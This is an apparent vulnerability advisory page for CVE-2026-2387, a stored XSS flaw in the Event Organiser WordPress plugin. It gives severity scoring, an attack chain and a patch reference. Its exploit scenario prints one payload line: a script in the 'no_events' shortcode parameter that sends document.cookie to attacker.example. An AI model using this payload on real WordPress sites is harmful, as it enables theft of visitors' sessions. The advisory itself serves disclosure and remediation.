Skip to main content

Event Organiser EUVDEUVD-2026-40904

| CVE-2026-2387 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-01 Wordfence GHSA-fmmj-9298-j37p
6.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
6.4 MEDIUM

Stored XSS with Contributor auth (PR:L) fires on normal page visit; Changed Scope reflects browser-context execution; no availability impact applies.

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 01, 2026 - 05:28 vuln.today
CVE Published
Jul 01, 2026 - 04:32 nvd
MEDIUM 6.4

DescriptionCVE.org

The Event Organiser plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.12.9. This is due to the 'eo_events' shortcode accepting attacker-controlled 'no_events' content and rendering it in event list templates without output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

AnalysisAI

Stored Cross-Site Scripting in the Event Organiser WordPress plugin (all versions through 3.12.9) allows an authenticated attacker with Contributor-level access or higher to inject arbitrary JavaScript via the unescaped 'no_events' parameter of the 'eo_events' shortcode. The payload persists server-side and executes in any visitor's browser when they load a page containing the injected shortcode with no matching events. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate as Contributor-level WordPress user
Delivery
Author post with malicious eo_events shortcode no_events payload
Exploit
Post published and stored server-side
Install
Victim loads injected page with no matching events
C2
Browser renders unescaped payload
Execute
Attacker-controlled script executes in victim browser context
Impact
Session credentials or sensitive data exfiltrated

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated WordPress account with Contributor-level access or higher - this is confirmed by the CVSS vector (PR:L) and the CVE description. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The NVD CVSS 3.1 score of 6.4 (Medium) is well-calibrated for this vulnerability. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers or socially engineers a Contributor-level WordPress account on the target site. They create a post containing [eo_events no_events='<script>fetch("https://attacker.example/c?d="+document.cookie)</script>'], which WordPress saves without sanitization. …
Remediation Update the Event Organiser plugin to the version that incorporates changeset 3589132 from the WordPress plugin SVN repository (https://plugins.trac.wordpress.org/changeset/3589132/event-organiser); this commit adds proper output escaping to the 'no_events' shortcode parameter. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-40904 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy